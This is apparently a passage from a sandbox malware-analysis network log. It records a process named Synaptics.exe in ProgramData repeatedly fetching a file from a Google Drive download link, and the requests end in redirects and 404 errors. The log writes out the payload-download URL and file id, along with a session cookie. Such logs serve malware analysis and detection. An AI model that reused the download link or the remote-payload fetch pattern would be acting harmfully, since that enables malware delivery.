                                                                                                                                                        2024-12-30 10:48:13 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        18192.168.2.749899142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:12 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-rlzGVrTmdqQ2ylMtsUXCyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        19192.168.2.749900142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:12 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:13 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7ZCohLJhndXIVrhUDrQprUey4PkU95_cujm4JOPJBQCcfqRklXXH7tO5D602pXcHGN
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:13 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-o8fS_VFkkuSeTFvCDYEc6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:13 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 4e 32 2d 47 62 73 74 30 51 47 6e 6e 4a 50 66 5a 62 70 69 2d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="GN2-Gbst0QGnnJPfZbpi-g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        20192.168.2.749907142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        21192.168.2.749909142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:13 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        22192.168.2.749908142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        23192.168.2.749910142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:13 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        24192.168.2.749918142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:14 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:14 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NbtMWeSftqjCA5QkcPyk1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        25192.168.2.749919142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:14 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:14 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TtP7R6le9cP-ZUUFiUkulQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        26192.168.2.749931142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-fnIKDjr773IT8DBKCcmP-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        27192.168.2.749932142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4DqMYHs_Bb34HQZ6rnylxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        28192.168.2.749930142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:15 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:15 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC62hyPrsp0AzqS8cV6Is9su_a3_xs9TRYcq_q7zbIihE7Q1JJqHTWLOE6MBDpfOJokGPiaIXnU
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MY7ZmaKP-8MULA2q5GHt-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:15 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:15 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 4b 6c 70 34 67 4b 34 79 70 76 6a 43 56 6f 46 46 36 78 4f 33 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="BKlp4gK4ypvjCVoFF6xO3Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:15 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        29192.168.2.749933142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:15 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:15 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5oznXsDYAgi4dwqWX1p_efBrGnCiXKvyLtFp3svzmC8aqunTLXXhy9gE-TyexzF0so
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
